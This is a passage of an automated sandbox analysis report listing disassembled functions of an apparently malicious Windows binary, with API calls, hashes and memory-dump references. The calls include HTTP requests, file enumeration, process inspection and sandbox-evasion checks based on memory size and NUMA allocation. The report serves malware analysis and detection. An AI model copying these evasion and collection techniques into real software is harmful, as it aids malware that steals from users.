String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 202145761cc4e01acf5582e000ac7bea1814c742719baec002ff77540f1c9097
Instruction ID: a6a5897ef0150124e2db4dee119a388ece992cb54c3dcf24a9374c24bdf1f897
Opcode Fuzzy Hash: 202145761cc4e01acf5582e000ac7bea1814c742719baec002ff77540f1c9097
Instruction Fuzzy Hash: 84213EB1D00209ABDF14DFA5EC45BDD7B74FB45320F108225F925A72D0DB706A0ACB92

Function 008A51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 00896280: InternetOpenA.WININET(008B0DFE,00000001,00000000,00000000,00000000), ref: 008962E1
Part of subcall function 00896280: StrCmpCA.SHLWAPI(?,0156E4F0), ref: 00896303
Part of subcall function 00896280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00896335
Part of subcall function 00896280: HttpOpenRequestA.WININET(00000000,GET,?,0156DC98,00000000,00000000,00400100,00000000), ref: 00896385
Part of subcall function 00896280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008963BF
Part of subcall function 00896280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008963D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008A5228

Strings

ERROR, xrefs: 008A521A
ERROR, xrefs: 008A5273

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 457706d754239a820148cfafb51c40904e5f2ac52935ae4d2766bf8515e4c741
Instruction ID: 28747376b9a81143240a9141a3e100ca4d403065c259776c2f2cc8f2b72cd7b6
Opcode Fuzzy Hash: 457706d754239a820148cfafb51c40904e5f2ac52935ae4d2766bf8515e4c741
Instruction Fuzzy Hash: 5E11DD30910548ABEB58FB68DD96AED7378FF51340F804164F81A9AD92EF346B06C692

Function 00891220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0089123E
ExitProcess.KERNEL32 ref: 00891294

Strings

@, xrefs: 00891233

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 803317263-2766056989
Opcode ID: ef7513d8fe1345bf1140a6475b7348fa0eff4ea1415cc319f003d48cd071aaf7
Instruction ID: a95a0899e3d0815a658c74f01ddf34172eb622467f9736dd344952e0a98d5456
Opcode Fuzzy Hash: ef7513d8fe1345bf1140a6475b7348fa0eff4ea1415cc319f003d48cd071aaf7
Instruction Fuzzy Hash: 7C01FBB0E44309AAEF10FBE4CD49B9EBB78FB14705F248049E606F66C0D7746645879A

Function 008A4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008A8E0B

lstrcat.KERNEL32(?,00000000), ref: 008A4F7A
lstrcat.KERNEL32(?,008B1070), ref: 008A4F97
lstrcat.KERNEL32(?,01568A60), ref: 008A4FAB
lstrcat.KERNEL32(?,008B1074), ref: 008A4FBD

Part of subcall function 008A4910: wsprintfA.USER32 ref: 008A492C
Part of subcall function 008A4910: FindFirstFileA.KERNEL32(?,?), ref: 008A4943

Part of subcall function 008A4910: StrCmpCA.SHLWAPI(?,008B0FDC), ref: 008A4971
Part of subcall function 008A4910: StrCmpCA.SHLWAPI(?,008B0FE0), ref: 008A4987
Part of subcall function 008A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 008A4B7D
Part of subcall function 008A4910: FindClose.KERNEL32(000000FF), ref: 008A4B92

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 08f6b66b94fb0740dbc09a9e0f76eca9eeedf28caae52dd5085528fe7f35e02d
Instruction ID: a1910985d76d4c438ae18a451b943d96c214c42a15191024e9bba4fd32cdede3
Opcode Fuzzy Hash: 08f6b66b94fb0740dbc09a9e0f76eca9eeedf28caae52dd5085528fe7f35e02d
Instruction Fuzzy Hash: 1D21D876900204ABCB54FBA4EC46EEE373CF765300F004545B65AD6581EE7496C98BA3

Function 008A0740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01568B30), ref: 008A079A
StrCmpCA.SHLWAPI(00000000,01568BB0), ref: 008A0866
StrCmpCA.SHLWAPI(00000000,01568AE0), ref: 008A099D

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 73cc868aac5781af48c8f2ce29d1dc3e57d4f687b2ad67f7704d6183d7261515
Instruction ID: 9cddff2d45f51fa2abce377bdc27cd906f39c70aa6c186f0e4d00fddc46660f4
Opcode Fuzzy Hash: 73cc868aac5781af48c8f2ce29d1dc3e57d4f687b2ad67f7704d6183d7261515
Instruction Fuzzy Hash: 56915875A101089FDF18EF68D995AEE77B5FF95300F408519E80ADF641DB30AA05CB93

Function 008A0765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01568B30), ref: 008A079A
StrCmpCA.SHLWAPI(00000000,01568BB0), ref: 008A0866
StrCmpCA.SHLWAPI(00000000,01568AE0), ref: 008A099D

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: b4df3017cd6aa84ec16b061b742a4fb279b486c108768c0b5d085b24d01cb2f9
Instruction ID: c92231da9d2a1f1cab3e7f1561d32108cf9ccb2d4b4a4f8f3c2230e088d00533
Opcode Fuzzy Hash: b4df3017cd6aa84ec16b061b742a4fb279b486c108768c0b5d085b24d01cb2f9
Instruction Fuzzy Hash: F0815575A101089FDB1CEF68D995AEEB7B5FF95300F508519E80ADB641DB30AA06CB83

Function 6C653060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C653095

Part of subcall function 6C6535A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C6DF688,00001000), ref: 6C6535D5
Part of subcall function 6C6535A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6535E0
Part of subcall function 6C6535A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6535FD
Part of subcall function 6C6535A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C65363F
Part of subcall function 6C6535A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C65369F
Part of subcall function 6C6535A0: __aulldiv.LIBCMT ref: 6C6536E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C65309F

Part of subcall function 6C675B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6756EE,?,00000001), ref: 6C675B85
Part of subcall function 6C675B50: EnterCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675B90
Part of subcall function 6C675B50: LeaveCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675BD8
Part of subcall function 6C675B50: GetTickCount64.KERNEL32 ref: 6C675BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6530BE

Part of subcall function 6C6530F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C653127
Part of subcall function 6C6530F0: __aulldiv.LIBCMT ref: 6C653140

Part of subcall function 6C68AB2A: __onexit.LIBCMT ref: 6C68AB30

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 0e0cdc154a02b5a123ad75d305439fadaf1b84d046cf834c0b44f7394be4601c
Instruction ID: 7e821f3c6f95d7c1e9a327f8a3053eed9933defdbf171d57371cc51e0863054d
Opcode Fuzzy Hash: 0e0cdc154a02b5a123ad75d305439fadaf1b84d046cf834c0b44f7394be4601c
Instruction Fuzzy Hash: 48F0D612D2078896CB10DF7588911A6B370AF6F114F545729F84463A61FB2071E883DE

Function 008A9470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 008A9484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 008A94A5
CloseHandle.KERNEL32(00000000), ref: 008A94AF

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 53f4eee12837be9f11ef017f312a7ab29120409e49d443a704d238b2e067dc6e
Instruction ID: 2133322831475e2e272a6262bebe11997bb792facb167b28d6f9aa43764d3caf
Opcode Fuzzy Hash: 53f4eee12837be9f11ef017f312a7ab29120409e49d443a704d238b2e067dc6e
Instruction Fuzzy Hash: A2F03A7490120CABEB04DFA4DC4AFEE7778FB08700F004498BA1A97290D6B06A86DB91

Function 00891110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0089112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00891132
ExitProcess.KERNEL32 ref: 00891143

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
